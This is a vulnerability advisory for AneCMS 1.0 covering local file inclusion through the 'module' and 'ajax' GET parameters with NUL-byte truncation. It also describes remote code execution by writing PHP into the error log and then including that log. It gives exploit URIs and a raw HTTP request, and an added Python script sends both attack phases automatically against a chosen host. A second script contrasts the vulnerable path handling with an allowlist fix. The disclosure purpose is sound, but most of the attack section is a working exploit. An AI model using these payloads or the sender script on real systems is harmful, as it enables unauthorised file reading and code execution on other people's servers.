AneCMS Multiple Vulnerabilities
##########################www.BugReport.ir########################################
#
# AmnPardaz Security Research Team
#
# Title:              AneCMS Multiple Vulnerabilities
# Vendor:             http://anecms.com/
# Vulnerable Version: 1.0 (latest version at the time of writing)
# Exploitation:       Remote, with a RAW HTTP packet sender
# Fix:                N/A
###################################################################################
####################
- Description:
####################
AneCMS is a small, fast and fully modular CMS. It is written in PHP with JavaScript (jQuery),
supports multiple languages and skins, and has an online repository of modules accessible
from the CMS's admin control panel (ACP). It uses MySQL as the backend DBMS.
####################
- Vulnerability:
####################
+--> Local File Inclusion (LFI)
    AneCMS builds the path of the local file it includes directly from GET parameters.
    25 files are affected, but almost all of them are protected; the exceptions are
    'index.php' and 'rss.php'. See the Exploits/PoCs section for details.
+--> Remote Code Execution
    With a RAW HTTP packet sender, unescaped PHP code can be sent to AneCMS so that it is
    written into the PHP error log. That code can then be executed through the LFI
    vulnerability. See the Exploits/PoCs section for details.
####################
- Exploits/PoCs:
####################
+--> Exploiting The Local File Inclusion (LFI)
    For 'rss.php', the 'module' GET parameter selects a local file by a path relative to
    the 'modules' directory. For example, the following URI reads the '.htaccess' file:
    http://target.com/rss.php?module=../.htaccess%00
    For 'index.php', the 'ajax' GET parameter selects a local file by a path relative to
    the 'system/ajax' directory. For example, the following URI reads the '.htaccess' file:
    http://target.com/index.php?ajax=../../.htaccess%00
    In both cases the trailing %00 decodes to a NUL byte, which truncates the include path
    so that whatever suffix the CMS appends after the parameter is discarded.
+--> Remote Code Execution
    This attack is performed in two phases. First, use the LFI to inject the desired PHP
    code into the PHP error log; then use the LFI again to include the log and execute it.
    For example, to run '<?php echo "ShahShah..."; ?>', first send the following HTTP
    packet (it must be sent unescaped, since browsers and most HTTP clients would
    percent-encode the spaces, quotes and angle brackets):
        GET /rss.php?module=../<?php echo "ShahShah..."; ?>%00 HTTP/1.0
        Host: target.com
        User-Agent: UA
    The failed include writes '<?php echo "ShahShah..."; ?>' into the error log. Then visit
    the following URI (the log path depends on the target's PHP configuration):
    http://target.com/rss.php?module=../the/path/to/logs/folder/logs/php_error.log%00
    This URI includes the error log, including the injected code, and executes it.
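The two-phase request sequence above as a small Python sender. This is an added example, not code from the advisory or from AneCMS: it builds both HTTP/1.0 requests byte for byte and pushes them over a plain socket, because ordinary HTTP clients would percent-encode the '<', '"' and spaces in the PHP code. The host 'target.com', the port and the error-log path are placeholders taken from the advisory or assumed for illustration.

```python
# Added example (not part of the original advisory): builds and sends the two raw
# HTTP requests of the log-poisoning chain. A raw socket is used because normal
# HTTP clients percent-encode '<', '"' and spaces, and the PHP code has to reach
# the server unescaped. Host, port and log path are assumptions / placeholders.
import socket

PHP_PAYLOAD = '<?php echo "ShahShah..."; ?>'


def build_poison_request(host: str, php_code: str = PHP_PAYLOAD,
                         script: str = "/rss.php") -> bytes:
    """Phase 1: request a non-existent 'module' whose name is PHP code.
    The failed include is written verbatim to the PHP error log. The trailing
    %00 is a NUL byte that truncates any suffix the CMS appends to the path."""
    request_line = f"GET {script}?module=../{php_code}%00 HTTP/1.0\r\n"
    headers = f"Host: {host}\r\nUser-Agent: UA\r\n"
    return (request_line + headers + "\r\n").encode("latin-1")


def build_include_request(host: str, log_path: str,
                          script: str = "/rss.php") -> bytes:
    """Phase 2: include the poisoned log through the same LFI so the injected
    PHP code runs. log_path is relative to the 'modules' directory."""
    request_line = f"GET {script}?module={log_path}%00 HTTP/1.0\r\n"
    headers = f"Host: {host}\r\nUser-Agent: UA\r\n"
    return (request_line + headers + "\r\n").encode("latin-1")


def send_raw(host: str, packet: bytes, port: int = 80,
             timeout: float = 10.0) -> bytes:
    """Send the packet unmodified and return the complete response."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(packet)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    target = "target.com"  # placeholder host from the advisory
    # Placeholder log path as written in the advisory; the real one depends on
    # the target's PHP configuration (error_log setting).
    log = "../the/path/to/logs/folder/logs/php_error.log"
    send_raw(target, build_poison_request(target))
    response = send_raw(target, build_include_request(target, log))
    print(response.decode("latin-1", errors="replace"))
```

The request line of the phase-1 packet is deliberately not URL-encoded; if the payload appears in the log as '%3C?php', the client used to send it has escaped it and the include in phase 2 will not execute anything.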
####################
- Solution:
####################
Instead of building the inclusion path directly from GET parameters, validate the parameter
against the set of expected values and then include the corresponding hard-coded file path.
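A model of the difference between the two approaches, added here as an example and not taken from AneCMS (which is PHP): vulnerable_resolve() mimics string concatenation followed by the NUL-byte truncation that PHP's include() performed before 5.3.4, which is why the %00 in the PoC URIs works; safe_resolve() is the allowlist approach from the Solution, where the parameter is only ever a lookup key. The '.php' suffix and the module names in ALLOWED_MODULES are assumptions for illustration.

```python
# Added example (not AneCMS code): vulnerable vs. allowlisted resolution of the
# 'module' / 'ajax' GET parameter. The '.php' suffix and module names are assumed.
import posixpath
from typing import Optional

# Hypothetical map of legitimate parameter values to hard-coded include paths.
ALLOWED_MODULES = {
    "news": "modules/news/rss.php",
    "blog": "modules/blog/rss.php",
}


def vulnerable_resolve(base_dir: str, param: str, suffix: str = ".php") -> str:
    """Build the path the vulnerable way: base + user input + suffix.
    A NUL byte in the decoded parameter ends the C string there, so the suffix
    is dropped and the attacker controls the complete file name (PHP < 5.3.4
    accepted such paths; later versions reject paths containing NUL)."""
    path = f"{base_dir}/{param}{suffix}"
    path = path.split("\x00", 1)[0]   # C-string truncation at the NUL byte
    return posixpath.normpath(path)   # collapse the ../ segments


def safe_resolve(param: str) -> Optional[str]:
    """Treat the parameter as a key, never as a path fragment. Any value that is
    not exactly an allowlisted key (including ones carrying '/', '..' or NUL)
    is rejected and no path is derived from it."""
    return ALLOWED_MODULES.get(param)


def demo() -> None:
    # Constructed inputs: the advisory's payloads after URL decoding.
    payloads = [
        ("modules", "../.htaccess\x00"),           # rss.php?module=../.htaccess%00
        ("system/ajax", "../../.htaccess\x00"),    # index.php?ajax=../../.htaccess%00
        ("modules", "../logs/php_error.log\x00"),  # phase 2 of the RCE chain (path assumed)
        ("modules", "../.htaccess"),               # without %00 the suffix is glued on
    ]
    for base, p in payloads:
        print(f"{p!r:36} vulnerable -> {vulnerable_resolve(base, p)!r:22} "
              f"safe -> {safe_resolve(p)!r}")
    print(f"{'news'!r:36} vulnerable -> {vulnerable_resolve('modules', 'news')!r:22} "
          f"safe -> {safe_resolve('news')!r}")


if __name__ == "__main__":
    demo()
```

The fourth payload shows why the PoCs need the NUL byte: without it the traversal still works but the path ends in '.htaccess.php', which does not exist. The allowlist rejects every traversal regardless of encoding tricks because it never treats the parameter as a path.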
####################
- Original Advisory:
####################
http://www.bugreport.ir/index_71.htm
####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com